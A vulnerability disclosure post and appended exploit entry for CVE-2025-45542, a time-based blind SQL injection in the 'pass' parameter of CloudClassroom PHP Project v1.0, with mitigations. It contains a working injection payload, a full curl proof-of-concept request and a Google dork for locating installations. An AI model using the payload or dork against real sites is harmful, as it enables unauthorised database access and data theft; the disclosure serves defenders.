📄 CloudClassroom PHP Project 1.0 SQL Injection

Hello Full Disclosure list,
    
    I am sharing details of a newly assigned CVE affecting an open-source
    educational software project:
    
    ------------------------------------------------------------------------
    CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP
    Project v1.0
    ------------------------------------------------------------------------
    
    Product: CloudClassroom PHP Project
    Vendor: https://github.com/mathurvishal/CloudClassroom-PHP-Project
    Affected Version: v1.0
    Vulnerability Type: SQL Injection
    Attack Type: Remote
    CVE ID: CVE-2025-45542
    Discoverer: Sanjay Singh
    
    Vulnerability Details:
    A time-based blind SQL injection vulnerability exists in the
    `registrationform` endpoint of CloudClassroom-PHP-Project v1.0. The `pass`
    parameter is not properly sanitized, allowing an unauthenticated remote
    attacker to manipulate backend SQL logic and potentially extract sensitive
    information.
    
    Proof of Concept:
    The vulnerability can be exploited using a POST request with a crafted
    payload like:
    `'XOR(if(now()=sysdate(),sleep(6),0))XOR'`
    
    Impact:
    Successful exploitation allows for:
    - Arbitrary SQL execution
    - Potential information disclosure
    - Authentication bypass under certain conditions
    
    Recommended Mitigations:
    - Use prepared statements with parameterized queries
    - Sanitize input with `mysqli_real_escape_string()` or similar
    - Implement a Web Application Firewall (WAF)
    - Enforce least privilege on the application’s DB user
    
    References:
    - GitHub: https://github.com/mathurvishal/CloudClassroom-PHP-Project
    - Exploit-DB Submission (pending approval)
    - GHDB Dork (submitted): `inurl:"CloudClassroom-PHP-Project-master"
    intitle:"Cloud Classroom"`
    
    I have also submitted this to Exploit-DB and the Google Hacking Database to
    assist defenders and researchers.
    
    Attached is a detailed advisory in plain text format.
    
    Regards,
    Sanjay Singh
    https://www.linkedin.com/in/sanjay70023
    
    https://gist.github.com/sanjay70023/63e9c32e49a0760eaa6b9e2a8ba8c966
    
    
    --- packet storm appended exploit below ---
    
    # Exploit Title: CloudClassroom PHP Project v1.0 - Time-Based Blind SQL Injection (pass parameter)
    # Google Dork: inurl:CloudClassroom-PHP-Project-master
    # Date: 2025-05-30
    # Exploit Author: Sanjay Singh
    # Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project
    # Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip
    # Version: 1.0
    # Tested on: XAMPP on Windows 10 / Ubuntu 22.04
    # CVE : CVE-2025-45542
    
    # Description:
    # A time-based blind SQL injection vulnerability exists in the pass parameter 
    # of the registrationform endpoint. An attacker can exploit this issue by sending 
    # a malicious POST request to delay server response and infer data.
    
    # PoC Request (simulated using curl):
    
    curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \
      -H "Content-Type: application/x-www-form-urlencoded" \
      -d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&[email protected]&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub="
    
    # The server response will be delayed if the SQL condition is true, confirming the injection point.